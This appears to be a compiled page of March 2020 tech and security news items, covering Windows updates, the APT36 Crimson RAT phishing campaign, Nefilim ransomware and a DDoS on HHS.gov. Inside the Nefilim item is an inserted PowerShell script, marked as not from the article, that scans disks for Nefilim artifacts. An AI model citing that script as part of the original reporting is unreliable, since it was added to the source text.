If you have the taskbar auto-hidden and your Terminal is maximized, the taskbar now appears when you mouse over the bottom of the screen.
Azure Cloud Shell can now run PowerShell, accept mouse input, and follow the desired shell of your choice.
Touchpad and touchscreen scrolling now moves at a normal pace.
Users who want to try the new features of Windows Terminal v0.10 can update it now from the Microsoft Store.


Windows 10 Cumulative Update KB4541331 Released
21.3.2020 
Bleepingcomputer  OS

If you're still using the dated Windows 10 October 2018 Update, which was released in November 2018, a new cumulative update is now available for your device.

Microsoft has released the KB4541331 optional update for Windows 10 version 1809 to fix a bug that causes printing issues, a bug that prevents the touch keyboard from appearing during sign in, and several other problems.

KB4541331 will advance your computer to Windows 10 Build 17763.1131 and it will install only after you check for updates manually.

Like every Windows Update, you can open the Settings app and click on the Windows Update option to install the patches. If you own multiple PCs or if you would like to patch the PCs manually, you can learn more about it here.

Here's what's new and improved in KB4541331:

Addresses an issue that causes an error when printing to a document repository.
Addresses a drawing issue with the Microsoft Foundation Class (MFC) toolbar that occurs when dragging in a multi-monitor environment.
Addresses an issue that prevents the touch keyboard from appearing during sign in when the user is prompted for the password.
Addresses an issue that causes new child windows to flicker and appear as white squares on server devices that are configured for stark visual contrast.
Addresses an issue that displays incorrect folder properties in File Explorer when the path is longer than MAX_PATH.
Addresses an issue that causes calendar dates to appear on the wrong day of the week in the clock and date region of the notification area when you select the Samoa time zone.
Addresses an issue with reading logs using the OpenEventLogA() function.
Addresses an issue that prevents machines that have enabled Credential Guard from joining a domain. The error message is "The server's clock is not synchronized with the primary domain controller's clock."
Addresses an issue that might cause a delay of up to two minutes when signing in or unlocking a session on Hybrid Azure Active Directory-joined machines.
Addresses an issue that causes authentication to fail when using Azure Active Directory and the user’s security identifier (SID) has changed.
Addresses an issue that might cause domain controllers (DC) to register a lowercase and a mixed or all uppercase Domain Name System (DNS) service (SRV) record in the _MSDCS. DNS zone. This occurs when DC computer names contain one or more uppercase characters.
Addresses an issue that causes authentication in an Azure Active Directory environment to fail and no error appears.
Addresses an issue that causes high CPU utilization when retrieving a session object.
Addresses high latency in Active Directory Federation Services (AD FS) response times for globally distributed datacenters in which SQL might be on a remote datacenter.
Improves the performance for all token requests coming to AD FS, including OAuth, Security Assertion Markup Language (SAML), WS-Federation, and WS-Trust.
Addresses a high latency issue in acquiring OAuth tokens when AD FS front-end servers and back-end SQL servers are in different datacenters.
Restores the constructed attribute in Active Directory and Active Directory Lightweight Directory Services (AD LDS) for msDS-parentdistname.
Addresses an issue to prevent SAML errors and the loss of access to third-party apps for users who do not have multi-factor authentication (MFA) enabled.
Addresses an issue with evaluating the compatibility status of the Windows ecosystem to help ensure application and device compatibility for all updates to Windows.
Addresses an issue that prevents Microsoft User Experience Virtualization (UE-V) settings from roaming to enable the signature files that are used for new messages, forwarded messages, and replies.
Addresses an issue with high CPU usage on AD FS servers that occurs when the backgroundCacheRefreshEnabled feature is enabled.
Addresses an issue that creates the Storage Replica administrator group with the incorrect SAM-Account-Type and Group-Type. This makes the Storage Replica administrator group unusable when moving the primary domain controller (PDC) emulator.
Addresses an issue that prevents some machines from automatically going into Sleep mode under certain circumstances because of Microsoft Defender Advanced Threat Protection (ATP) Auto Incident Response (IR).
Addresses an issue that prevents some machines from running Microsoft Defender ATP Threat & Vulnerability Management successfully.
Improves support for non-ASCII file paths for Microsoft Defender ATP Auto IR.
Addresses an issue that, in some scenarios, causes stop error 0xEF while upgrading to Windows 10, version 1809.

Microsoft is aware of at least one known issue in this update where some Asian language packs installed may receive the error, "0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND."

Microsoft says it's working on a resolution and it will provide an update in a future release.

One billion devices
Earlier this week, Microsoft revealed that Windows 10 is now being actively used on 1 billion devices every month. The operating system was released in the second half of 2015 and it took nearly five years for Windows 10 to become active on 1 billion devices.

"New Windows 10 features and security updates are now delivered faster than ever before. We’ve evolved from releasing a version every three years, to releasing multiple versions per year. And with the recent decoupling of the new Chromium-based Edge browser from Windows 10 we can now deliver new builds to customers outside of the normal Windows 10 release cadence—and to more versions of Windows," said Yusuf Mehdi, Corporate Vice President, Modern Life, Search & Devices at Microsoft.


Nation-Backed Hackers Spread Crimson RAT via Coronavirus Phishing
21.3.2020 
Bleepingcomputer  APT  Phishing  Virus 

A state-sponsored threat actor is attempting to deploy the Crimson Remote Administration Tool (RAT) onto the systems of targets via a spear-phishing campaign using Coronavirus-themed document baits disguised as health advisories.

This nation-backed cyber-espionage group is suspected to be Pakistan-based and is currently tracked under multiple names including APT36, Transparent Tribe, ProjectM, Mythic Leopard, and TEMP.Lapis.

The group, active since at least 2016, is known for targeting Indian defense and government entities and for stealing sensitive info designed to bolster Pakistan's diplomatic and military efforts.

Coronavirus-themed spear-phishing campaign
APT36's ongoing spear-phishing attacks were first spotted by researchers with QiAnXin's RedDrip Team who discovered malicious documents camouflaged as health advisories and impersonating Indian government officials.

The spear-phishing emails, attributed by the Chinese researchers to the Transparent Tribe hacking group and also analyzed by Malwarebytes Labs' Threat Intelligence Team, are trying to trick the targets into enabling macros so that the Crimson RAT payload can be deployed.

APT36 uses two lure formats in this campaign: Excel documents with embedded malicious macros and RTF files designed to exploit the CVE-2017-0199 Microsoft Office/WordPad remote code execution vulnerability.

Fake Coronavirus health advisory (Malwarebytes Labs)
Once the malicious documents used as baits are opened and the malicious macros are executed, a 32-bit or a 64-bit version of the Crimson RAT payload will be dropped based on the victim's OS type.

After the device is compromised, the attackers can perform a wide range of data theft tasks including but not limited to:

• Stealing credentials from the victim’s browser
• Listing running processes, drives, and directories on the victim’s machine
• Retrieving files from its C&C server
• Using custom TCP protocol for its C&C communications
• Collecting information about antivirus software
• Capturing screenshots

After being executed, the Crimson RAT will automatically connect to the hardcoded command-and-control addresses and send all the information collected on the victim, including the list of running processes, the machine's hostname, and the currently logged-in username.

"APT36 has used many different malware families in the past, but has mostly deployed RATs, such as BreachRAT, DarkComet, Luminosity RAT, and njRAT," Malwarebytes says.

"In past campaigns, they were able to compromise Indian military and government databases to steal sensitive data, including army strategy and training documents, tactical documents, and other official letters.

"They also were able to steal personal data, such as passport scans and personal identification documents, text messages, and contact details."

State-backed groups behind other Coronavirus-themed attacks
APT36 is not the only nation-sponsored threat actor known for using COVID-19-themed malware and phishing emails to attack and infect potential targets.

Chinese APTs (Mustang Panda and Vicious Panda), North Korean APTs (Kimsuky), Russian APTs (Hades and TA542), as well as some without known affiliations such as SWEED, have also recently adopted Coronavirus baits as part of their attacks, as reported by ZDNet.

Cybercriminals with no nation-state ties have also been playing the Coronavirus card heavily trying to monetize on their targets' COVID-19 fears.

Phishing campaigns using Coronavirus baits have targeted US and UK targets since the start of February, impersonating U.S. Centers for Disease Control and Prevention (CDC) officials and virologists.

New malware strains have also been spotted since the Coronavirus outbreak started, such as a new ransomware called CoronaVirus used as a cover for the Kpot Infostealer, a Remote Access Trojan (RAT), a Trojan, a stealer/keylogger, and even a wiper.

The World Health Organization (WHO) also warned of active Coronavirus-themed phishing attacks impersonating WHO officials with the end goal of delivering malware and stealing the targets' sensitive information.

Last but not least, Ancient Tortoise BEC fraudsters have also been seen sending scam emails that use the Coronavirus outbreak as a pretext for changing the payment information on invoices to bank accounts under their control.


Microsoft Edge to Let You Set Custom Backgrounds for New Tabs
21.3.2020 
Bleepingcomputer  OS

Microsoft is testing the ability to set a custom background image for the new tab page in Microsoft Edge Canary build 82.0.457.0.

For those who are using the latest Microsoft Edge Canary build, Microsoft is conducting a limited test that allows you to change the background image to one of your choosing.

To change to a custom desktop background, you would open a new tab page, click on the Settings cog, and then select Custom. If you are part of the test, you will be able to see an option to set the background to "Your own image" as shown below.

Setting a custom background in Microsoft Edge
You will then be prompted to select an image that you want to be used as the background for the new tab page.

Below you can see a custom background that BleepingComputer applied to the new tab page.

Microsoft Edge using a custom background for the NTP
As already stated, this feature is currently only available to those whose Edge clientID has been added to this test.


New Nefilim Ransomware Threatens to Release Victims' Data
21.3.2020 
Bleepingcomputer  Ransomware

A new ransomware called Nefilim that shares much of the same code as Nemty has started to become active in the wild and threatens to release stolen data.

Nefilim became active at the end of February 2020 and, while it is not known for sure how the ransomware is being distributed, it is most likely through exposed Remote Desktop Services.

Head of SentinelLabs Vitali Kremez and ID Ransomware's Michael Gillespie both told BleepingComputer that Nefilim and Nemty 2.5 share much of the same code.

The main difference is that Nefilim has removed the Ransomware-as-a-Service (RaaS) component and now relies on email communications for payments rather than a Tor payment site.

It is not known if this is a fork of their ransomware from the original operators or if new threat actors obtained the source code to release a new version.

Nefilim threatens to release data
In the Nefilim ransom note, the attackers state that if a user does not pay the ransom in seven days they will release data that was stolen from the network.

A large amount of your private files have been extracted and is kept in a secure location.
If you do not contact us in seven working days of the breach we will start leaking the data.
After you contact us we will provide you proof that your files have been extracted.

In the past, this would have been seen as an empty threat, but with ransomware infections such as Maze, Sodinokibi, DoppelPaymer, and Nemty all following through with their threats, it should no longer be ignored.

The Nefilim encryption process
When encrypting files, Nefilim will encrypt a file using AES-128 encryption. This AES encryption key will then be encrypted by an RSA-2048 public key that is embedded in the ransomware executable.

This encrypted AES key will then be added to the contents of each encrypted file and can only be decrypted by the RSA private key known to the ransomware developers.

For each encrypted file, Nefilim will append the .NEFILIM extension to the file name. For example, a file called 1.doc would be encrypted and named 1.doc.NEFILIM.

Files encrypted by the Nefilim Ransomware
In addition to the encrypted AES key, the ransomware will also add the "NEFILIM" string as a file marker to all encrypted files as shown below.

NEFILIM file marker
When done, a ransom note named NEFILIM-DECRYPT.txt will be created throughout the system that contains instructions on how to contact the ransomware developers.

This ransom note contains different contact emails and the threat that they will leak data if a ransom is not paid within seven days of the "breach".

Unfortunately, a brief analysis by Gillespie indicates that this ransomware appears to be secure, which means that there is no current way to recover files for free.

The ransomware, though, is still being researched, and if new weaknesses are found we will publish updated information.
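For incident responders triaging a suspected infection, the following PowerShell scan is an added example (not from the article or from any vendor tooling) that looks for the three on-disk artifacts described above: the .NEFILIM extension, the "NEFILIM" marker string, and the NEFILIM-DECRYPT.txt note. The article does not say where in the file the marker is written, so searching the last few KB of each file is an assumption; the sample files at the bottom are constructed for the demo and are not real ransomware output.

```powershell
# Added example, not the article's or any vendor's code: triage scan for Nefilim artifacts.
function Test-ContainsBytes {
    param([byte[]] $Haystack, [int] $Length, [byte[]] $Needle)
    # Naive byte search; fine for a few KB per file.
    for ($i = 0; $i -le $Length - $Needle.Length; $i++) {
        $j = 0
        while ($j -lt $Needle.Length -and $Haystack[$i + $j] -eq $Needle[$j]) { $j++ }
        if ($j -eq $Needle.Length) { return $true }
    }
    return $false
}

function Find-NefilimArtifacts {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [int] $TailBytes = 4096   # assumption: marker and encrypted AES key sit near the end of the file
    )
    $marker    = [System.Text.Encoding]::ASCII.GetBytes('NEFILIM')
    $encrypted = New-Object System.Collections.Generic.List[string]
    $marked    = New-Object System.Collections.Generic.List[string]
    $notes     = New-Object System.Collections.Generic.List[string]

    foreach ($f in Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue) {
        if ($f.Name -ieq 'NEFILIM-DECRYPT.txt') { $notes.Add($f.FullName); continue }
        if ($f.Extension -ine '.NEFILIM')       { continue }
        $encrypted.Add($f.FullName)

        # Read only the tail so large encrypted files are not loaded whole.
        $fs = [System.IO.File]::OpenRead($f.FullName)
        try {
            $len = [int][Math]::Min($fs.Length, $TailBytes)
            $fs.Seek(-$len, [System.IO.SeekOrigin]::End) | Out-Null
            $buf  = New-Object byte[] $len
            $read = $fs.Read($buf, 0, $len)
        } finally { $fs.Dispose() }

        if (Test-ContainsBytes -Haystack $buf -Length $read -Needle $marker) { $marked.Add($f.FullName) }
    }

    [PSCustomObject]@{
        EncryptedFiles  = $encrypted.ToArray()   # renamed with the .NEFILIM extension
        FilesWithMarker = $marked.ToArray()      # subset that also carries the NEFILIM string
        RansomNotes     = $notes.ToArray()       # NEFILIM-DECRYPT.txt copies found
    }
}

# Demo on constructed sample files: one renamed file carrying the marker, one untouched file,
# and a placeholder ransom note. Random bytes stand in for AES-encrypted content.
$demo = Join-Path ([System.IO.Path]::GetTempPath()) 'nefilim-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
$fake = New-Object byte[] 256
(New-Object System.Random).NextBytes($fake)
$markerBytes = [System.Text.Encoding]::ASCII.GetBytes('NEFILIM')
[System.IO.File]::WriteAllBytes((Join-Path $demo '1.doc.NEFILIM'), [byte[]]($fake + $markerBytes))
Set-Content -Path (Join-Path $demo 'notes.txt') -Value 'plain file, untouched'
Set-Content -Path (Join-Path $demo 'NEFILIM-DECRYPT.txt') -Value 'constructed placeholder note'

Find-NefilimArtifacts -Path $demo | Format-List
```

Point the function at a real share or user profile (for example `Find-NefilimArtifacts -Path 'D:\Shares'`) to get the same report for a suspected host.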


US Democratic Party Symbol Changed to a Rat in Google Search
21.3.2020 
Bleepingcomputer  BigBrothers

The election symbol of the US Democratic Party has been changed to a rat within the Google search knowledge panel that shows when searching for the party's name, instead of the usual donkey-themed one.

While no one knows how this happened, the new rat-themed symbol displayed when searching for "democratic party" on Google is now automatically loaded from a post made by a now-banned user on a history forum in January.

US Democratic Party Symbol Changed to a Rat in Google Search
The rat election symbol is currently being shown for all search results that show the Democratic Party symbol.

The Republican Party symbol remains unchanged for now, but its knowledge panel does display the changed Democratic Party symbol at the bottom.

Republican Party Knowledge Panel
Researchers from cybersecurity intelligence company Under the Breach, who first discovered this change, say it is unclear how this was done.

BleepingComputer has reached out to Google for comment but had not heard back at the time of this publication. This article will be updated when a response is received.

This is a developing story ...

H/T Under the Breach

Update March 16, 18:41 EDT: "Most images in Knowledge Panels are automatically generated from pages on the web," a Google spokesperson told BleepingComputer.

"When errors are reported, we fix them quickly. We encourage people and organizations to claim their Knowledge Panels, which allows them to select a representative image."

The Democratic Party rat election symbol was automatically displayed in the Knowledge Panel based on a web source, and Google will remove it since the image is not representative of the entity.


Google Chrome 82 to Enhance Privacy via New Cookie Settings
21.3.2020 
Bleepingcomputer  Privacy

Google is making progress on expanding the control users have over cookies in the Chrome browser with a new flag in Canary that enables an improved interface with more buttons and information.

The experimental feature is available in the Android version 82 of the browser and adds two more options for cookie management.

No 3rd-party cookies in incognito mode
In the current configuration of Chrome 80 stable for all supported platforms, you can allow/block cookies on all sites or just block third-party ones. The latter comes with the warning that some sites may not work properly when the restriction is active.

The new Cookies user interface in Canary for Android shows four controls instead of the two currently available in the stable version of the browser, and adds a brief description of cookie data:

"Cookies are files created by websites you visit. Sites use them to remember your preferences. Third-party cookies are created by other sites. These sites own some of the content, like ads or images, that you see on the webpage you visit."

One option that becomes available when enabling the experimental feature can prevent websites from reading and saving cookie data when browsing in incognito mode.

A browsing session in incognito mode starts with a blank internal profile that holds no cookies or session data; cookies are added as you visit websites. They do not affect the normal browsing session and are purged when the last incognito window is closed.

The other option allows you to block all cookies. This is not a recommended option, though, since it will likely impact your experience on many websites.


The option to add sites that are exempt from the active setting is still available below the buttons.

The flag that enables the four buttons is called "Enable improved cookie controls in UI in incognito mode." You can look for it in the 'chrome://flags' experimental area.


You can also find the experimental flag in the current stable version of Chrome but it appears that the new Cookie menu does not activate with it.


Windows 10 2004 to Upgrade WSL2 Linux Kernels via Windows Update
21.3.2020 
Bleepingcomputer  OS

Microsoft has announced that the upcoming Windows 10 2004 release will also include Windows Subsystem for Linux 2 (WSL 2) whose Linux kernel will be kept updated via Windows Update.

When Microsoft announced WSL2, they explained that all WSL2 distributions would use a real Microsoft-compiled Linux kernel based on the stable 4.19 version release of Linux at Kernel.org.

Starting with Windows 10 2004, which is expected to be released shortly, and in the latest Windows 10 Insider build 19041.153, when using WSL2 the Linux kernel will first need to be upgraded.

After upgrading, when you attempt to convert a WSL distribution to WSL2 or to launch an existing WSL2 distro, Windows 10 will prompt you to first update to the latest Linux kernel by displaying the following message.

"WSL 2 requires an update to its kernel component. For information please visit https://aka.ms/wsl2kernel"

Prompt to update Windows Linux kernel
For now, Windows 10 users will need to manually download and install the latest WSL 2 kernel using these instructions.

At this time, after installing the available Linux kernel update, WSL 2 distributions will be using the following kernel:

Linux version 4.19.84-microsoft-standard (oe-user@oe-host) (gcc version 8.2.0 (GCC)) #1 SMP Wed Nov 13 11:44:37 UTC 2019
In a future update to Windows 10 2004, though, Microsoft plans on distributing new WSL 2 kernels via Windows Update.

Similar to Windows Defender updates and Security Intelligence definition updates, if a new Linux kernel is available it will be downloaded when a user checks for new updates via Windows Update.

"If you’ve ever gone to your Windows settings, and clicked ‘Check for Updates’ you might have seen some other items being updated like Windows Defender malware definitions, or a new touchpad driver, etc. The Linux kernel in WSL2 will now be serviced in this same method, which means you’ll get the latest kernel version independently of consuming an update to your Windows image," Microsoft explained in a new blog post.

WSL2 becoming generally available soon is exciting news for users of this feature, as it brings numerous performance improvements to Windows.

As WSL2 uses a true Linux kernel, Linux apps will now have full access to their normal system calls, which will bring increased compatibility with existing Linux apps and greater performance.


FBI Warns of Human Traffickers Luring Victims on Social Networks
21.3.2020 
Bleepingcomputer  BigBrothers

FBI's Internet Crime Complaint Center (IC3) today issued a public service announcement on human traffickers' continued usage of online platforms like dating sites and social networks to lure victims.

"The FBI warns the public to remain vigilant of the threat posed by criminals who seek to traffic individuals through force, fraud, or coercion through popular social media and dating platforms," the PSA says.

"Offenders often exploit dating apps and websites to recruit—and later advertise—sex trafficking victims. In addition, offenders are increasingly recruiting labor trafficking victims through what appears to be legitimate job offers."

Online platform tools used against vulnerable targets
According to the FBI's investigations, victims from many different backgrounds, from rural areas to large cities, are being lured by human traffickers into forced labor or sex work through online platforms.

In many cases, the criminals will pose as legitimate job recruiters or agents of employment agencies and will bait potential victims with the promise of fake employment and a better life.

Individuals who share personal information on online platforms are the ones most likely to be targeted by such criminals, especially after posting about "financial hardships, their struggles with low self-esteem, or their family problems."

The traffickers use their targets' stories as the basis for well-planned approaches over the Internet, convincing them that they want to be helpful or that they are interested in a relationship.

However, their victims will subsequently be coerced into sex work or forced labor after the traffickers manage to establish a false sense of trust and they persuade them to meet in person.

Human traffickers using online platforms
During the last few years, the FBI discovered multiple cases of human traffickers using popular social networks and dating sites to recruit victims.

Among the multiple such cases identified over the years, the FBI shares the following three examples:

In July 2019, a Baltimore, Maryland, man was convicted on two counts of sex trafficking of a minor and one count of using the Internet to promote a business enterprise involving prostitution. The perpetrator targeted two girls after they posted information online about their difficult living and financial situation. After meeting them in person, the man forced the two girls into sex work.
In March 2019, a married couple was found guilty of conspiracy to obtain forced labor and two counts of obtaining forced labor. The couple employed foreign workers to perform domestic labor in their home in Stockton, California. The defendants used the Internet and an India-based newspaper to post false advertisements about the wages and nature of the employment at their home. Upon arrival, the workers were forced to work 18-hour days with little to no wages.
In October 2017, a sex trafficker was convicted on 17 counts of trafficking adults and minors. Additional charges included child pornography and obstruction of justice. The perpetrator received a 33-year sentence. A victim from the Seattle area met the sex trafficker's accomplice on a dating website. The trafficker and his accomplice later promised to help the victim with her acting career. After a few months, the victim was abused and forced into prostitution.
Report (potential) trafficking situations
"Human trafficking occurs in every area of the country and occurs in many forms, from forced labor to sexual exploitation, including the sexual exploitation of children," FBI Criminal Investigative Division Section Chief Michael Driscoll said last year.

"The FBI operates Human Trafficking and Child Exploitation Task Forces throughout the country to aggressively investigate the perpetrators and also provides resources to assist the victims of these crimes.”

Victims and those who think that they witnessed a potential human trafficking situation are encouraged by the FBI to contact their local law enforcement agencies, the local FBI field office, or to reach out to:

the National Human Trafficking Hotline—Call 1-888-373-7888 (TTY: 711) or text 233733;
file a complaint online with the FBI's Internet Crime Complaint Center at www.IC3.gov; or
contact the FBI's National Threat Operations Center at 1-800-CALL-FBI or tips.fbi.gov.
To report possible trafficking involving minors, contact the National Center for Missing and Exploited Children (NCMEC) at 1-800-THE-LOST (1-800-843-5678) or at Cybertipline.org.
Victims and witnesses are also urged by the FBI to keep as much evidence as possible including emails, text messages, or any other logs of communication with the traffickers to make it easier to identify, retain, and prosecute them.

"The FBI produced this public service announcement to alert Internet users of the continuing threat posed by human traffickers online and what you should do if you or someone you know suspects human trafficking," the PSA concludes.


U.S. Health Department Site Hit With DDoS Cyber Attack
21.3.2020 
Bleepingcomputer  Attack

The United States Health and Human Services Department's web site was hit with a DDoS cyber attack Sunday night to take it offline in the middle of the Coronavirus outbreak.

Since the COVID-19 outbreak, there has been a tremendous spike in people searching for HHS information about the Coronavirus, as shown by the graph below.

Increased searches for HHS.gov site
First reported by Bloomberg, attackers on Sunday night attempted to disrupt the dissemination of Coronavirus information by performing a DDoS attack against the HHS.gov web site.

A DDoS (distributed denial of service) attack is when attackers flood a web site or IP address with a huge number of simultaneous connections or requests, overwhelming the server so that it can no longer respond to legitimate visitors.

"The attack appears to have been intended to slow the agency’s systems down, but didn’t do so in any meaningful way, said the people, who asked for anonymity to discuss an incident that was not public," Bloomberg reported.

Later that night, the National Security Council tweeted an alert to ignore text messages spreading "rumors of a national quarantine" and that there is no national lockdown.

NSC Tweet

According to one of Bloomberg's sources, this tweet was in response to a disinformation campaign being conducted by the attackers in conjunction with the attempt to take down the HHS.gov site.

Government officials are aware of the attack and assume it was a foreign cyber attack, but have not been able to confirm that at this time.

"Secretary of State Michael Pompeo and other Trump administration officials are aware of the incident, one of the people said," Bloomberg continued.

Coronavirus related cyber attacks becoming common
Whenever a world event brings panic and anxiety, criminals attempt to take advantage of the situation.

Such is the case with the Coronavirus where we are seeing related phishing campaigns, malware and ransomware, and cyber attacks against hospitals and testing centers.

This past Friday, the University Hospital Brno in the Czech Republic was shut down due to a cyber attack that started in the early morning hours.

This hospital hosts one of the 18 labs used to test for the Coronavirus and was performing 20 tests a day until the attack.


Windows 10 KB4551762 Security Update Fails to Install, Causes Issues
21.3.2020 
Bleepingcomputer  OS

The Windows 10 KB4551762 security update is reportedly failing to install and throwing 0x800f081f, 0x80004005, 0x80073701, 0x800f0988, 0x80071160, and 0x80240016 errors during the installation process according to user reports.

KB4551762 is an out-of-band security update released by Microsoft last week to patch the critical remote code execution vulnerability (CVE-2020-0796) affecting devices running Windows 10, versions 1903 and 1909, and Windows Server (Server Core installations), versions 1903 and 1909.

To install KB4551762, you can check for updates via Windows Update or manually download it for your Windows version from the Microsoft Update Catalog. Admins can distribute the update to enterprise environments via Windows Server Update Services (WSUS).

If you have automatic updates enabled on your device, the update will install automatically and you do not need to take any further action.


Usual workarounds not working
Usually there is a workaround for update errors, such as installing the update manually or following a specific procedure. This time, however, users who have encountered these issues (1, 2, 3, 4, 5, 6, 7) report via Microsoft's official Feedback Hub, the Microsoft Community website, and Reddit that none of the usual workarounds for the errors helped.

0x800f0988 and 0x800f0900 installation errors were also spotted and reported by Günter Born, one day after KB4551762 was released by Microsoft.

"Manual Windows Update on the local client works ONCE. It finds the patch, then does nothing! One can attempt to download and install from that page, but it doesn't work! Next, go to the Catalog," one user reported through Microsoft's Feedback Hub. "Attempt to select the correct configuration. Download the patch. Attempt to install it. Doesn't install!"

"When downloading this update my PC started becoming slow and sluggish, the update got stuck at 100%," another one reported. "I restarted the PC then windows updates broke and started looping for a while when checking updates, its now back to normal but now I have a failed cumulative update."

"So I've had this issue since KB4497165, but the latest KB4551762 is also giving me the same problem," another one said on Reddit. "Basically after it installs, it gets to 7% on the "working on updates" part, then tells me that it failed, and it's undoing changes."

Feedback Hub KB4551762 user reports
Also plagued by CPU spikes, random restarts, boot failures
Other reports, although not as numerous as the ones saying that KB4551762 comes packed with installation issues, mention CPU spikes, high disk usage, system slowdowns, and system freezes.

"These issues began yesterday 3/13/20. The update, '2020-03 Cumulative Update for Windows 10 Version 1909 for x64-based Systems (KB4551762)' has failed every time I try to install it with the error code, '0x80071160'," one user says. "When this issue began my disk drive also went up to 100% with little change. I restarted my pc multiple times but both issues persisted."

"After installing KB4551762 and KB4540673, my system has gone to thrash. Extremely slow and takes ages to get past the Welcome screen," another one explains. "After spending hours trying to login, I somehow managed to uninstall both the updates, rebooted, disabled and re-enabled HyperV but my system won't go back to being normal."

"Simply downloading the update caused my computer to overheat and freeze multiple times," a bug report on the Feedback Hub says. "Finally, with no programs open in the background, the download was able to go through. When I attempted to restart so the update could take effect, it would get stuck at 93% installing the update. Always stuck at 93%."

To top it all off, there are also reports of random restarts or failures to boot, as well as users who are having gaming issues after installing KB4551762 with the monitor starting to flicker after a game starts and the issue going away after closing the game.

Windows 10 in-place upgrade: a potential solution
While the KB4551762 installation issues are quite widespread according to users, there are some who have successfully managed to deploy the security update using a Windows 10 in-place upgrade.

Using this method you will be able to clean-up your system to resolve some issues, and it should not affect your programs and files.

The procedure is detailed in the video embedded below and it requires you to download and install the Windows 10 installation media, sign in to your account, and accept privacy settings. Additionally, you will need admin rights to upgrade.


Verily Coronavirus Screening Site Launches, Quickly Runs Out of Slots
21.3.2020 
Bleepingcomputer  Security
Project Baseline

Verily has launched its Project Baseline Coronavirus screening site for people living in the San Francisco Bay Area that lets people check if they need a test and where to get one.

This new site is being launched by Verily, an Alphabet company and sister company to Google, and allows only those people living in the Bay Area to enter their symptoms, recent travel, and other information to determine if a Coronavirus test is necessary.

COVID-19 Screening site
This site is only available for residents living in Santa Clara County and San Mateo County with the hopes of eventually expanding to other locations in the future.

Using this site, though, does have some requirements: being 18 or older, a U.S. resident, living in one of the two counties, able to speak and read English, and willing to sign a COVID-19 Public Health authorization form.

Screening requirements
Initially announced as a Google nationwide testing site by President Trump during a Friday press conference, it was quickly clarified as being only available to Bay Area residents.

Since then, Google has announced that they will be working with the U.S. government to release a nationwide site for Coronavirus information.

There is no timeline yet as to when this nationwide site will become available.

Testing appointments quickly run out
Since launching late last night, the screening site's available appointment slots quickly ran out.

When users start the screening process and specify they live in the required regions, the site will immediately state "Unfortunately, we are unable to schedule more appointments at this time. Appointments will continue to expand through this program as we scale capacity in the near future."

Appointments run out

BleepingComputer has contacted Verily for more information about how many people scheduled appointments and when more slots would be available, but has not heard back as of yet.


Xbox Live and Support.xbox.com Experiencing an Outage
21.3.2020 
Bleepingcomputer  IT

Microsoft is currently experiencing an outage where some users are unable to log in to Xbox Live, have issues with matchmaking, and are unable to access support.xbox.com.

At approximately 5:00 PM EST, users started reporting that they were unable to log in to Xbox Live or access their saved games, or were having issues with matchmaking. Since then, users have also been having issues opening support.xbox.com.

Microsoft has confirmed these issues in the Xbox Support Twitter account as can be seen below.

Tweet about Xbox Live being down
Tweet about support.xbox.com being down
When users try to access support.xbox.com, they will simply be greeted with the animated Xbox loading circle as seen below.

Support.xbox.com outage
At approximately 7:30 PM EST, service was restored for both Xbox Live and support.xbox.com.


Folding@Home Now Has 23 Coronavirus Projects, Donate CPU Power!
21.3.2020 
Bleepingcomputer  IT

The Folding@home distributed computing project has added twenty new Coronavirus (COVID-19) projects since earlier this week that use donated CPU or GPU power to research new treatment methods.

Folding@home allows researchers to use donated CPU and GPU cycles to simulate protein folding to research new drug opportunities against diseases and a greater understanding of various diseases.

Last week, we reported that Folding@home added three new projects (11741, 11742, and 11743) that were being used to research the COVID-19 virus and how to create potential drug therapies.

Since we last looked on March 9th, 2020, researchers from Memorial Sloan Kettering Cancer Center, Washington University in St. Louis, and Temple University have added 20 new projects, for a total of 23, all of which are being used to analyze the proteins of the Coronavirus.

"To help tackle coronavirus, we want to understand how these viral proteins work and how we can design therapeutics to stop them," Folding@home's announcement stated.

The Current Folding@home project IDs that correspond with Coronavirus (COVID-19) research are 11741, 11742, 11743, 11744, 11745, 11746, 11747, 11748, 11749, 11750, 11751, 11752, 11759, 11760, 11761, 11762, 11763, 11764, 14328, 14329, 14530, 14531, and 14532.

Getting started with Folding@home
To get started with Folding@home, download the Folding@home client and install it.

Once installed, Folding@home will automatically be configured to lightly use your computer's CPU and GPU processing power to perform protein folding when you log into Windows. A GPU will only be used if its hardware and software are supported.

If you wish to increase the amount of CPU and GPU utilization, you can right-click on the Folding@home icon in your Windows system tray and select 'Light', 'Medium', or 'Full'.

It should be noted that the higher the intensity you select, the slower your computer will become, the more heat it will generate, and the more electricity it will use.

Folding@home options
If you want to check what project you are currently working on or change some of the program's settings via a web GUI, you can select the 'Web Control' option as shown in the image above.

This will open a web page showing your current work-in-progress, your settings, and the project ID you are currently working on. To support Coronavirus projects, make sure to support research fighting 'Any Disease'.

Folding@Home
After determining the project ID number, you can look up the project ID you are working on here. For example, in the image above you can see that the project ID is 14329, which is for Coronavirus/COVID-19 research.

The Folding@home project has said that due to the increasing interest in the project and CPU and GPU cycles being donated, it may take some time before you receive a job to work on.

"Each simulation you run is like buying a lottery ticket. The more tickets we buy, the better our chances of hitting the jackpot. Usually, your computer will never be idle, but we’ve had such an enthusiastic response to our COVID-19 work that you will see some intermittent downtime as we sprint to setup more simulations. Please be patient with us! There is a lot of valuable science to be done, and we’re getting it running as quickly as we can," Folding@home stated.

If you have an idle computer sitting around doing nothing, please contribute it to the project. Who knows, the data you are assigned and solve could be what helps to create a cure!


List of Free Software and Services During Coronavirus Outbreak
15.3.2020 
Bleepingcomputer  IT

In response to the Coronavirus (COVID-19) outbreak, many organizations are asking their employees to work remotely. This, though, brings new challenges to the workplace as users adapt to video meetings, screen sharing, and the use of remote collaboration tools.

To assist a new wave of remote workers, and get some publicity at the same time, many software developers and service providers have started to offer free licenses or enhanced versions of their software and services.

Below is a roundup of all the free upgrades to services and software licenses being offered during the Coronavirus outbreak.

If you are a software developer or technology service provider and would like to add any free offers to this list, please contact us and let us know.

AT&T
According to a report by Vice, AT&T is suspending broadband data caps during the Coronavirus outbreak.

AT&T is the first major ISP to confirm that it will be suspending all broadband usage caps as millions of Americans bunker down in a bid to slow the rate of COVID-19 expansion. Consumer groups and a coalition of Senators are now pressuring other ISPs to follow suit.

Cisco
Cisco is changing its free Webex meeting software so that it supports unlimited usage, supports up to 100 people per meeting, and has toll dial-in availability.

